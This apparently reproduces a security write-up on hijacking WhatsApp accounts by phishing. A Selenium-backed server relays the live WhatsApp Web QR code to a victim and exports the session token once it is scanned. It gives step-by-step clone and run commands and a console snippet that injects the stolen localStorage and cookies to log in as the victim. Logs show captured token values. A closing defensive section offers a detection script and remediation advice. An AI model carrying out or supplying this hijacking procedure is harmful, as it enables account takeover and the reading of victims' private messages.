[Phishing] HIJACKING WHATSAPP ACCOUNTS USING WHATSAPP WEB

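In short, this is a phishing attack: the user is lured into scanning a QR code so that the token can be obtained.

The attacker runs an HTTP (express) and socket.io server. When a user connects to the socket.io server, the application automatically sends a request to a Selenium instance (wd); Selenium opens a browser and connects to web.whatsapp.com. It grabs the QR code from the page and sends it to the client over the websocket. The client renders the QR code for the user with JavaScript.

Once the QR code is scanned, WhatsApp authenticates the Selenium-controlled browser and stores the token in localStorage and document.cookie. The program exports the sensitive data to a secret file in the directory.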

Reproduction Steps:

OS: macOS

  • Run the commands below
$ java -Dwebdriver.chrome.driver=chromedriver -jar selenium-server-standalone-3.0.1.jar
$ # new terminal
$ git clone https://github.com/Mawalu/whatsapp-phishing.git
$ cd whatsapp-phishing
$ npm install
$ node index.js
  • Open browser and visit http://localhost:8080
  • Scan QR Code
  • Open web.whatsapp.com.
  • Open your developer console
  • Enter the following code:
> var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)
  • Reload the page
  • You should be logged in as the person who scanned the QR code

Nodejs Log:

➜  whatsapp-phishing git:(master) ✗ node index.js
Listening on 127.0.0.1, server_port 8090
a target connected
Starting to wait for tokens
Entering interval
{"s":{"WABrowserId":"\"1ZDQWkw8icR8SS0RmWRufQ==\"","debugCursor":"45","remember-me":"true","storage_test":"storage_test","ver":"1","whatsapp-mutex":"\"x519591963:init_1487302940513\""},"c":""}
1@SIGm3KfnFSmBWLMp+xK7KDKBipCCmAgaY02DwS8iXcXDZm2/L1+mmIIe,hV2jrhTC6DPob3CW1QbRK5avcyyfD7oqxPI3cXo2y10=,1ZDQWkw8icR8SS0RmWRufQ==
Entering interval
[snip...]
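
For incident response, the dump format visible in the log above (`s` holding localStorage entries, `c` holding the cookie string) can be recognized in files or logs recovered from a host. The following is an added example, not code from the original page or from the whatsapp-phishing project; the function names and sample lines are constructed, and it reports key names only, never values.

```javascript
// Added example: triage helper that flags lines shaped like the session dump
// shown in the Node.js log ({"s": {...localStorage...}, "c": "cookie string"}).
// SESSION_KEYS are the localStorage keys visible in that log line.
const SESSION_KEYS = ['WABrowserId', 'remember-me', 'whatsapp-mutex'];

// Returns a finding for one line of text, or null if it is not a session dump.
function classifyLine(line) {
  let obj;
  try {
    obj = JSON.parse(line);
  } catch (e) {
    return null; // ordinary log text such as "Entering interval"
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) return null;
  if (obj.s === null || typeof obj.s !== 'object' || typeof obj.c !== 'string') return null;

  const present = SESSION_KEYS.filter((k) => Object.prototype.hasOwnProperty.call(obj.s, k));
  if (!present.includes('WABrowserId')) return null; // unrelated JSON with s/c fields

  const cookieNames = obj.c.split(';').map((c) => c.split('=')[0].trim()).filter(Boolean);
  return {
    storageKeys: Object.keys(obj.s).sort(),
    sessionKeys: present,
    cookieNames,
    persistent: obj.s['remember-me'] === 'true', // session survives browser restart
  };
}

// Scans multi-line text and returns findings with 1-based line numbers.
function scanText(text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    const f = classifyLine(line.trim());
    if (f) findings.push({ line: i + 1, ...f }); // values are never copied out
  });
  return findings;
}

// Constructed sample input; the WABrowserId value is a placeholder.
const SAMPLE = [
  'a target connected',
  'Entering interval',
  '{"s":{"WABrowserId":"\\"Q09OU1RSVUNURUQ=\\"","remember-me":"true","ver":"1"},"c":""}',
  '{"level":"info","msg":"unrelated json"}',
].join('\n');

console.log(JSON.stringify(scanText(SAMPLE), null, 2));
```

A hit means the affected account's WhatsApp Web sessions should be logged out from the phone, which invalidates the exported token.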

Selenium Log:


Command duration or timeout: 17 milliseconds
Build info: version: '3.0.1', revision: '1969d75', time: '2016-10-18 09:48:19 -0700'
System info: host: 'itsMBP.local', ip: '192.168.1.214', os.name: 'Mac OS X', os.arch: 'x86_64', os.version: '10.11.6', java.version: '1.8.0_101'
Driver info: org.openqa.selenium.chrome.ChromeDriver
Capabilities [{applicationCacheEnabled=false, rotatable=false, mobileEmulationEnabled=false, networkConnectionEnabled=false, chrome={chromedriverVersion=2.27.440174 (e97a722caafc2d3a8b807ee115bfb307f7d2cfd9), userDataDir=/var/folders/96/kfv86wt15h5_5m9bkl7hcnnr0000gn/T/.org.chromium.Chromium.8PQDsF}, takesHeapSnapshot=true, pageLoadStrategy=normal, databaseEnabled=false, handlesAlerts=true, hasTouchScreen=false, version=55.0.2883.95, platform=MAC, browserConnectionEnabled=false, nativeEvents=true, acceptSslCerts=true, locationContextEnabled=true, webStorageEnabled=true, browserName=chrome, takesScreenshot=true, javascriptEnabled=true, cssSelectorsEnabled=true, unexpectedAlertBehaviour=}]
Session ID: 56c8b5295bff3d84e152bbd92c8549fe
*** Element info: {Using=css selector, value=.qrcode}
11:45:05.843 WARN - Exception: no such session
  (Driver info: chromedriver=2.27.440174 (e97a722caafc2d3a8b807ee115bfb307f7d2cfd9),platform=Mac OS X 10.11.6 x86_64) (WARNING: The server did not provide any stacktrace information)
